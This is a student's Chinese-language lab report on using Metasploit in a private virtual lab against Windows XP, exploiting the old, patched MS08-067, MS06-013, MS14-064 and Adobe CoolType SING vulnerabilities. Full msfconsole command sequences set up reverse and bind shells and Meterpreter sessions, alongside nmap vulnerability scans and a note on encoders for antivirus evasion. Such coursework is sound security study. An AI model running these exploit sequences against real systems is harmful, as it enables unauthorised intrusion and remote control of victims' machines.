Exp6 MSF应用基础

发布时间 2023-05-04 23:19:20作者: 20201312许铮怡

Exp6 MSF应用基础

0.基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.

  • exploit是渗透攻击,这个模块下面有针对各种平台各种软件下的漏洞开发的渗透攻击子模块,用户可以调用某一个连接漏洞对靶机进行攻击,将payload传送到靶机中。
  • payload是载荷,是攻击者用来与系统交互的简单脚本,exploit把它送到靶机中后,是真正负责进行攻击代码。
  • encode是编码,可以通过编码来消除类似0x00等漏洞无法处理的字符,来改变payload;还可以实现免杀,比如伪装特征码,本来容易被靶机安全软件所察觉,用了这个编码器中的编码后就打乱了特征码,从而迷惑靶机,不让杀毒软件很轻易的就发现payload是攻击代码。

1.实验过程记录

1.0 准备工作

1.1一个主动攻击实践,尽量使用最新的类似漏洞;

利用ms08_067漏洞攻击Windows XP

攻击方式:ms08_06

靶机:Windows XP

xp系统打开cmd,再输入ipconfig指令查看其IP。
xp:192.168.233.139
kali:192.168.233.136

4

两台虚拟机相互能ping通

5

6

攻击者试探靶机是否存在此漏洞 nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.233.139

7

存在漏洞信息

启动 msfconsole,输入search ms08_067查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi		//选择使用的渗透模块
set payload generic/shell_reverse_tcp	   //使用的payload
set RHOSTS 192.168.233.139                 //设置靶机IP
exploit

9

成功获得shell

10

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

  • 利用ms06_013_createtextrange漏洞攻击Windows XP SP3的IE浏览器

    use exploit/windows/browser/ms06_013_createtextrange //选择使用exploit漏洞
    set payload windows/meterpreter/reverse_tcp  //选择payload
    show options //查看所需调的参数
    exploit   //开始攻击
    

    11

    在XP的IE浏览器打开在XP的IE浏览器打开

    http://192.168.233.136:8080/rVDOEPVEUtoG
    

    浏览器开始从0-100计时。

    12

  • 利用ms14_064进行漏洞攻击

    use windows/browser/ms14_064_ole_code_execution
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.233.136
    set LPORT 1312
    set URIPATH 1312xzy
    exploit
    

    13

    在windows xp虚拟机的浏览器中输入:

    http://192.168.233.136:8080/1312xzy
    

    这时kali创建了连接

    先exit,再键入:sessions -i 2就会显示攻击成功:

    14

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

攻击方式:Adobe(adobe_cooltype_sing) (XP)

msfconsole //进入控制台
search adobe //进行查找
use windows/fileformat/adobe_cooltype_sing //使用漏洞
info //查看漏洞具体信息
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看详细信息
set LPORT 1312//设置端口号
set RHOST 192.168.233.139//设置靶机IP地址
exploit #攻击
将生成的msf文件复制到win xp中,点击回连
(可以使用cp命令将文件复制到桌面再移动,也可以使用超级用户权限进入root)

use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看详细信息
set RHOST 192.168.233.139 //设置靶机IP地址
set LPORT 1312 //设置端口号
exploit //攻击

15

问题1

回连未成功

1.4 成功应用任何一个辅助模块。

端口扫描:auxiliary/scanner/portscan

对XP主机进行TCP端口扫描。

use auxiliary/scanner/portscan/tcp // 选择tcp脚本
show options 	//查看需要调的参数
set Rhosts 192.168.233.139  //设置靶机IP
exploit 

16

最后可以得出,XP主机开放的TCP端口有三个,分别是135端口、139端口、445端口。

2.问题与解决

在做第三个实验时,XP虚拟机双击回连,kali虚拟机无反应,感觉并未触发回连

问题1

这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。

3.实验总结与体会

​ 本次实验是迄今为止我遇到问题最多的一次,首先XP虚拟机的安装配置就用了我好长时间,下载好的虚拟机界面只有一个回收站图标,加上对老的系统的不熟悉,花了好久才找到映射网络驱动器。

​ 想要真正实现一次攻击,不仅要找到一个合适的漏洞,还要知道这个漏洞具体是干嘛的、这个漏洞与哪个版本的系统相匹配、如何才能实现漏洞攻击等一系列步骤。好不容易找到了一个漏洞,却发现它可能根本不适用于win7\winXP。

4.离实战还缺些什么技术和步骤

本次实验中我们使用的漏洞都是已经公开的,且已经被打过补丁的漏洞,这些漏洞现在因为版本的更新而无法使用,起到的更多的是示例效果。况且攻击前还需要确保对方关闭了防火墙、确保对方打开了需要的端口、还需要知道对方的ip地址......这些在真正的实战中都是无法得到保障的。

所以想要真正在实战中用到漏洞,就要找到一些尚未被发现的漏洞,或者掌握一些类似于绕过防火墙的攻击手段,很明显想要做到这个地步,需要我们了解并掌握大量的网络安全知识。